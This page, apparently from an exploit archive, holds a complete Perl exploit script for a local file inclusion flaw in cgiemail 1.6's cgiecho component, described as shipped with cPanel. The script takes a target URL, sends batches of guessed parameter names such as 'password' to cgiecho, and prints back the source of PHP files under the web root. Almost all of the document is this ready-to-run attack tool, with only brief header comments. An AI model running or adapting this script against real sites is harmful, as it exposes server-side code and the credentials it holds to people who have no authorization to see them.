扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
#!/usr/bin/env perl # Exploit Title:cgiemail local file inclusion # Vendor Homepage:http://web.mit.edu/wwwdev/cgiemail/webmaster.html # Software Link:http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz # Version:1.6 and older # Date: 2016-09-27 # cgiecho a script included with cgiemail will return any file under a # websites document root if the file contains square brackets and the text # within the brackets is guessable. # cgiemail is currently shipped with cPanel and is enabled by default. # Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass'] #will display http://hostname/login.php if login.php contains $_POST['pass'] ## # cgiemail local file inclusion exploit # Author: Finbar Crago <finbar.crago@gmail.com> # https://github.com/finbar-crago/cgiemail-exploit ## use strict; use warnings; use POSIX; use LWP::UserAgent; use HTML::Entities; use Getopt::Long; $|++; $\="\n"; $,=" "; sub usage { die <<"EOF"; cgiemail local file inclusion exploit Usage: $0 [options] target Options: --names Check for names in commer separated list --num Check for numbers --num-max Maximum number to check (default 10) --batch Number of arguments sent per request (default 10) --cgiecho-pathPath of cgiecho on server (default '/cgi-sys/cgiecho/') --user-agentSet user-agent (default 'Mozilla/5.0') --deley Pause between requests in seconds (default 1) --timeout Set connection timeout (default 10) Example: $0 --num --names 'email,password' http://hostname/login.php > login.php EOF } my $names; my $num = 0; my $num_max = 10; my $batch = 10; my $cgiecho_path = '/cgi-sys/cgiecho'; my $user_agent = 'Mozilla/5.0'; my $timeout = 10; my $deley = 1; GetOptions( 'names=s'=> \$names, 'num'=> \$num, 'num-max=i'=> \$num_max, 'batch=i'=> \$batch, 'cgiecho-path' => \$cgiecho_path, 'user-agent=s' => \$user_agent, 'deley=i'=> \$deley, 'timeout=i'=> \$timeout, ); usage unless defined $ARGV[0] && $ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i; my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php'; my $url = "$conn$host/$cgiecho_path/$path"; my @list= (); if($num){ push @list, $_ for 0..$num_max } if($names){ push @list, "%22$_%22","%27$_%27" for split/,/,$names; } my $ua = LWP::UserAgent->new; $ua->agent($user_agent); $ua->timeout($timeout); $batch--; my $i=0; my $end = ceil($#list/$batch); while($#list+1){ my $args='?'; my $to = ($#list > $batch)?$batch:$#list; $args.="$_=[$_]&" for @list[0..$to]; @list = @list[$to+1..$#list]; my $res = $ua->get($url.$args); die $res->status_line if !$res->content_is_html; my $html = $res->decoded_content; if($html !~ />cgiemail[\n\r ]*([\d.]+)/){ print "cgiemail not found"if !$i; print "cgiemail was here but now it's not..." if $i; exit -1; } print STDERR "detected cgiemail $1" if !$i; print STDERR "\e[Jrequest ".++$i." of $end..."; if($res->code == 200){ $html =~ m|<PRE>(.+)</PRE>|s; print decode_entities($1); print STDERR "success!"; exit; } if($res->code == 500){ if($html =~ m|500 Could not open template - No such file or directory|){ print STDERR "the file /$path doesn't exist..."; } elsif($html =~ m|500 Empty template file|){ print STDERR "/$path is a directory..."; } else{ print STDERR "unknown 500 error:"; print STDERR $html; } exit -1; } select(undef,undef,undef,$deley); printf "\eM"; } print STDERR "sorry, no match found for $path"; exit -1; |
体验盒子
